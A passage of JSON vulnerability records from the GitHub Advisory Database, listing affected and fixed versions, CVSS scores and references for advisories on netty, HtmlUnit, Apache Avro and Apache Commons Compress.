} ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": 
"pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2156" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3748/commits/4ac519f534493bb0ca7a77e1c779138a54faa7b9" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3754" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/2caa38a2795fe1f1ae6ceda4d69e826ed7c55e55" }, { "type": 
"WEB", "url": "https://github.com/netty/netty/commit/31815598a2af37f0b71ea94eada70d6659c23752" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222923" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a19bb1003b0d6cd22475ba83c019b4fc7facfef2a9e13f71132529d3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc1275aef115bda172851a231c76c0932d973f9ffd8bc375c4aba769@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-IONETTY-73571" }, { "type": "WEB", "url": "https://www.playframework.com/security/vulnerability/CVE-2015-2156-HttpOnlyBypass" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159379.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159166.html" }, { "type": "WEB", "url": "http://netty.io/news/2015/05/08/3-9-8-Final-and-3.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/05/17/1" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/74704" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:59:55Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3xrr-7m6p-p7xh", "published": "2023-07-06T19:24:13Z", "modified": "2024-02-17T05:32:04.097962Z", "aliases": [ "CVE-2023-26119" ], "summary": "HtmlUnit Code Injection vulnerability", 
"details": "Versions of the package `net.sourceforge.htmlunit:htmlunit` from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSLT, when browsing the attacker’s webpage.", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "versions": [ "1.14", "2.0", "2.1", "2.1.5", "2.10", "2.11", "2.12", "2.13", "2.14", "2.15", "2.16", "2.17", "2.18", "2.19", "2.2", "2.20", "2.21", "2.22", "2.23", "2.24", "2.25", "2.26", "2.27", "2.28", "2.29", "2.3", "2.30", "2.31", "2.32", "2.33", "2.34.0", "2.34.1", "2.35.0", "2.36.0", "2.37.0", "2.38.0", "2.39.0", "2.39.1", "2.4", "2.40.0", "2.41.0", "2.42.0", "2.43.0", "2.44.0", "2.45.0", "2.46.0", "2.47.0", "2.47.1", "2.48.0", "2.49.0", "2.49.1", "2.5", "2.50.0", "2.51.0", "2.52.0", "2.53.0", "2.54.0", "2.55.0", "2.56.0", "2.57.0", "2.58.0", "2.59.0", "2.6", "2.60.0", "2.61.0", "2.62.0", "2.63.0", "2.64.0", "2.65.0", "2.65.1", "2.66.0", "2.67.0", "2.68.0", "2.69.0", "2.7", "2.70.0", "2.8", "2.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-3xrr-7m6p-p7xh/GHSA-3xrr-7m6p-p7xh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26119" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit/commit/641325bbc84702dc9800ec7037aec061ce21956b" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEHTMLUNIT-3252500" }, { "type": "WEB", "url": "https://siebene.github.io/2022/12/30/HtmlUnit-RCE" } ], "database_specific": { "cwe_ids": [ "CWE-74", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T22:00:23Z", "nvd_published_at": "2023-04-03T05:15:00Z", "severity": "CRITICAL" }, 
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5mh9-r3rr-9597", "published": "2020-05-21T21:08:33Z", "modified": "2024-10-15T23:41:37.767130Z", "aliases": [ "CVE-2020-5529" ], "summary": "Code execution vulnerability in HtmlUnit", "details": "HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavaScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application. ", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.37.0" } ] } ], "versions": [ "1.14", "2.0", "2.1", "2.1.5", "2.10", "2.11", "2.12", "2.13", "2.14", "2.15", "2.16", "2.17", "2.18", "2.19", "2.2", "2.20", "2.21", "2.22", "2.23", "2.24", "2.25", "2.26", "2.27", "2.28", "2.29", "2.3", "2.30", "2.31", "2.32", "2.33", "2.34.0", "2.34.1", "2.35.0", "2.36.0", "2.4", "2.5", "2.6", "2.7", "2.8", "2.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-5mh9-r3rr-9597/GHSA-5mh9-r3rr-9597.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5529" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit/commit/bc1f58d483cc8854a9c4c1739abd5e04a2eb0367" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit/releases/tag/2.37.0" }, { "type": "WEB", "url": "https://jvn.jp/en/jp/JVN34535327" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra2cd7f8e61dc6b8a2d9065094cd1f46aa63ad10f237ee363e26e8563%40%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2cd7f8e61dc6b8a2d9065094cd1f46aa63ad10f237ee363e26e8563@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00023.html" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4584-1" } ], "database_specific": { "cwe_ids": [ "CWE-665", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2020-05-21T17:25:38Z", "nvd_published_at": "2020-02-11T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6jmm-mp6w-4rrg", "published": "2022-04-26T21:14:57Z", "modified": "2023-11-08T04:09:13.642010Z", "aliases": [ "CVE-2022-29546" ], "related": [ "CVE-2022-29546" ], "summary": "OutOfMemory Exception by specifically crafted processing instruction in NekoHtml Parser", "details": "### Impact\nNekoHtml Parser suffers from a denial of service vulnerability on versions 2.60.0 and below. A specifically crafted input regarding the parsing of processing instructions leads to heap memory consumption. 
Please update to version 2.61.0.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [https://github.com/HtmlUnit/htmlunit-neko](https://github.com/HtmlUnit/htmlunit-neko)\n* Email us at [rbri at rbri.de]\n", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:neko-htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/neko-htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.61.0" } ] } ], "versions": [ "2.21", "2.23", "2.24", "2.25", "2.27", "2.28", "2.30", "2.31", "2.32", "2.33", "2.34.0", "2.35.0", "2.36.0", "2.37.0", "2.38.0", "2.39.0", "2.40.0", "2.41.0", "2.42.0", "2.43.0", "2.44.0", "2.45.0", "2.46.0", "2.47.0", "2.47.1", "2.48.0", "2.49.0", "2.50.0", "2.51.0", "2.52.0", "2.53.0", "2.54.0", "2.55.0", "2.56.0", "2.57.0", "2.58.0", "2.59.0", "2.60.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-6jmm-mp6w-4rrg/GHSA-6jmm-mp6w-4rrg.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit-neko/security/advisories/GHSA-6jmm-mp6w-4rrg" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29546" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit-neko/commit/9d2aecd69223469e40c12ca3edddda09009110cc" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit-neko" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-04-26T21:14:57Z", "nvd_published_at": "2022-04-25T03:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g9hh-vvx3-v37v", "published": "2022-04-23T00:03:04Z", "modified": "2024-12-05T05:41:29.184965Z", "aliases": [ "CVE-2022-28366" ], "summary": "Denial of service in HtmlUnit-Neko", "details": 
"Certain Neko-related HTML parsers allow a denial of service via crafted Processing Instruction (PI) input that causes excessive heap memory consumption. In particular, this issue exists in HtmlUnit-Neko through 2.26, and is fixed in 2.27. This issue also exists in CyberNeko HTML through 1.9.22 (also affecting OWASP AntiSamy before 1.6.6), but 1.9.22 is the last version of CyberNeko HTML. NOTE: this may be related to CVE-2022-24939.", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:neko-htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/neko-htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.27" } ] } ], "versions": [ "2.21", "2.23", "2.24", "2.25" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-g9hh-vvx3-v37v/GHSA-g9hh-vvx3-v37v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28366" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit-neko" }, { "type": "WEB", "url": "https://github.com/nahsra/antisamy/releases/tag/v1.6.6" }, { "type": "WEB", "url": "https://search.maven.org/artifact/net.sourceforge.htmlunit/neko-htmlunit" }, { "type": "WEB", "url": "https://sourceforge.net/projects/htmlunit/files/htmlunit/2.27" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2022-04-26T20:12:38Z", "nvd_published_at": "2022-04-21T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r7pg-v2c8-mfg3", "published": "2024-10-03T12:30:48Z", "modified": "2025-07-10T23:44:42.719245Z", "aliases": [ "CVE-2024-47561" ], "related": [ "CGA-24wg-f7c9-6234", "CGA-6hqm-x64f-4f58", "CGA-6pm2-j37h-3fvw", "CGA-6pm4-w9vr-cj5w", "CGA-j4wj-mh37-jf86", "CGA-r5wx-5789-jqwq" ], "summary": "Apache Avro Java SDK: 
Arbitrary Code Execution when reading Avro Data (Java SDK)", "details": "Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code.\nUsers are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue.", "affected": [ { "package": { "name": "org.apache.avro:avro", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.avro/avro" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.11.4" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.4.0", "1.4.1", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.8.0", "1.8.1", "1.8.2", "1.9.0", "1.9.1", "1.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-r7pg-v2c8-mfg3/GHSA-r7pg-v2c8-mfg3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47561" }, { "type": "WEB", "url": "https://github.com/apache/avro/pull/2934" }, { "type": "WEB", "url": "https://github.com/apache/avro/pull/2980" }, { "type": "WEB", "url": "https://github.com/apache/avro/commit/8f89868d29272e3afea2ff8de8c85cb81a57d900" }, { "type": "WEB", "url": "https://github.com/apache/avro/commit/f6b3bd7e50e6e09fedddb98c61558c022ba31285" }, { "type": "PACKAGE", "url": "https://github.com/apache/avro" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/AVRO-3985" }, { "type": "WEB", "url": "https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241011-0003" }, { "type": "WEB", "url": "https://thehackernews.com/2024/10/critical-apache-avro-sdk-flaw-allows.html" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2024/10/03/1" }, { "type": "WEB", "url": 
"http://www.openwall.com/lists/oss-security/2024/10/03/1" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2024-10-03T16:52:52Z", "nvd_published_at": "2024-10-03T11:15:13Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rhrv-645h-fjfh", "published": "2023-09-29T18:30:22Z", "modified": "2025-07-31T14:37:21.698951Z", "aliases": [ "CVE-2023-39410", "PYSEC-2023-188" ], "related": [ "CGA-8q34-h6rx-rrwj", "CGA-x2r8-2m8h-66gj" ], "summary": "Apache Avro Java SDK vulnerable to Improper Input Validation", "details": "When deserializing untrusted or corrupted data, it is possible for a reader to consume memory beyond the allowed constraints and thus lead to out of memory on the system.\n\nThis issue affects Java applications using Apache Avro Java SDK up to and including 1.11.2. 
Users should update to apache-avro version 1.11.3 which addresses this issue.", "affected": [ { "package": { "name": "org.apache.avro:avro", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.avro/avro" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.11.3" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.4.0", "1.4.1", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.8.0", "1.8.1", "1.8.2", "1.9.0", "1.9.1", "1.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-rhrv-645h-fjfh/GHSA-rhrv-645h-fjfh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39410" }, { "type": "WEB", "url": "https://github.com/apache/avro/commit/a12a7e44ddbe060c3dc731863cad5c15f9267828" }, { "type": "PACKAGE", "url": "https://github.com/apache/avro" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/avro/PYSEC-2023-188.yaml" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/AVRO-3819" }, { "type": "WEB", "url": "https://lists.apache.org/thread/q142wj99cwdd0jo5lvdoxzoymlqyjdds" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/09/29/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/09/29/6" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2023-09-29T22:06:14Z", "nvd_published_at": "2023-09-29T17:15:46Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4265-ccf5-phj5", "published": "2024-02-19T09:30:52Z", "modified": 
"2025-02-13T19:35:45.384593Z", "aliases": [ "CGA-9f5h-57xr-g74j", "CVE-2024-26308" ], "related": [ "CGA-4qfq-4jjg-v7x8", "CGA-5jhg-gjx7-pq4m", "CGA-96mq-j5w6-4gc5", "CGA-cm9w-hfx3-j2p6", "CGA-ggv5-qcv7-p79c", "CGA-gjfq-fj8p-3fpm", "CGA-gp4f-pvwr-2rc6", "CGA-j2pm-vhxf-h6gg", "CGA-ppj7-32h7-rr4m", "CGA-rq5c-r89h-7gmf", "CGA-x85q-h487-67fx" ], "summary": "Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file", "details": "Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26.\n\nUsers are recommended to upgrade to version 1.26, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.21" }, { "fixed": "1.26.0" } ] } ], "versions": [ "1.21", "1.22", "1.23.0", "1.24.0", "1.25.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-4265-ccf5-phj5/GHSA-4265-ccf5-phj5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26308" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://lists.apache.org/thread/ch5yo2d21p7vlqrhll9b17otbyq4npfg" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240307-0009" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/02/19/2" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2024-02-20T23:59:29Z", "nvd_published_at": "2024-02-19T09:15:38Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } 
] }, { "schema_version": "1.7.3", "id": "GHSA-4g9r-vxhx-9pgx", "published": "2024-02-19T09:30:50Z", "modified": "2025-11-04T21:07:59.755805Z", "aliases": [ "CGA-6rmf-ffqm-f8vv", "CVE-2024-25710" ], "related": [ "CGA-2xg7-8qm4-vx87", "CGA-3wh2-6f5w-rxm4", "CGA-679f-cjh5-5f6q", "CGA-86rr-9236-xpq3", "CGA-f3gh-9fhg-9hjp", "CGA-gr35-gp4q-q78f", "CGA-gxfq-hm2x-69x4", "CGA-hw3c-xmgp-wcw7", "CGA-jx86-68h8-6jqw", "CGA-qm27-j3j5-mwr9", "CGA-w8q8-p4r5-xxg9" ], "summary": "Apache Commons Compress: Denial of service caused by an infinite loop for a corrupted DUMP file", "details": "Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.3 through 1.25.0.\n\nUsers are recommended to upgrade to version 1.26.0 which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.3" }, { "fixed": "1.26.0" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23.0", "1.24.0", "1.25.0", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-4g9r-vxhx-9pgx/GHSA-4g9r-vxhx-9pgx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25710" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://lists.apache.org/thread/cz8qkcwphy4cx8gltn932ln51cbtq6kf" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240307-0010" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Aug/37" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/02/19/1" } ], 
"database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2024-02-20T23:58:47Z", "nvd_published_at": "2024-02-19T09:15:37Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-53x6-4x5p-rrvv", "published": "2019-10-11T18:41:08Z", "modified": "2024-03-16T05:19:51.255480Z", "aliases": [ "CVE-2019-12402" ], "summary": "Denial of Service in Apache Commons Compress", "details": "The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.15" }, { "fixed": "1.19" } ] } ], "versions": [ "1.15", "1.16", "1.16.1", "1.17", "1.18" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-53x6-4x5p-rrvv/GHSA-53x6-4x5p-rrvv.json" } }, { "package": { "name": "io.github.1tchy.java9modular.org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/io.github.1tchy.java9modular.org.apache.commons/commons-compress" }, "versions": [ "1.18.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-53x6-4x5p-rrvv/GHSA-53x6-4x5p-rrvv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12402" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", 
"url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0001" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53@%3Cdev.brooklyn.apache.org%3E" }, { "type": "WEB", "url": 
